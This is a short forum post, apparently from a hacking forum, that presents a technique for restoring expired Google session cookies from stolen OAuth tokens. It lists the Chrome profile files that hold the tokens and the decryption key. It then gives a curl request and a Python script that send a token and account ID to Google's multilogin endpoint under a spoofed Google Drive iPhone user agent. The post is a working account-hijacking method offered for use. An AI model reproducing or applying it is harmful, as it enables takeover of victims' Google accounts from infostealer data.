GOOGLE 0AUTH TOKEN RESTORE | восстанавливать УМЕРШИЕ КУКИ по ключу из файлов Restore
Никаких объяснений не требуется
CURL REQUEST :
Никаких объяснений не требуется
C:\Users\<Username>\AppData\Local\Google\Chrome\User Data\<Profile or Default Folder>\Web DataC:\Users\<Username>\AppData\Local\Google\Chrome\User Data\Local StateCURL REQUEST :
Код:
curl -X POST "https://accounts.google.com/oauth/multilogin" -H "Accept: */*" -H "User-Agent: com.google.Drive/6.0.230903 iSL/3.4 iPhone/15.7.4 hw/iPhone9_4 (gzip)" -H "Authorization: MultiBearer [TOKEN HERE : ACCOUNT ID HERE " -H "Accept-Language: en-US,en;q=0.9" -H "Content-Type: application/x-www-form-urlencoded" -d "source=com.google.Drive"
Python:
import requests
def perform_multilogin(token, account_id):
url = "https://accounts.google.com/oauth/multilogin"
headers = {
"Accept": "*/*",
"User-Agent": "com.google.Drive/6.0.230903 iSL/3.4 iPhone/15.7.4 hw/iPhone9_4 (gzip)",
"Authorization": f"MultiBearer {token}:{account_id}",
"Accept-Language": "en-US,en;q=0.9",
"Content-Type": "application/x-www-form-urlencoded"
}
data = {"source": "com.google.Drive"}
response = requests.post(url, headers=headers, data=data)
# Process the response as needed
print(response.text)
# Example usage:
token_input = input("Enter the Token: ")
account_id_input = input("Enter the Account Id: ")
perform_multilogin(token_input, account_id_input)
https://xss.pro/threads/78553/post-708579
Последнее редактирование:

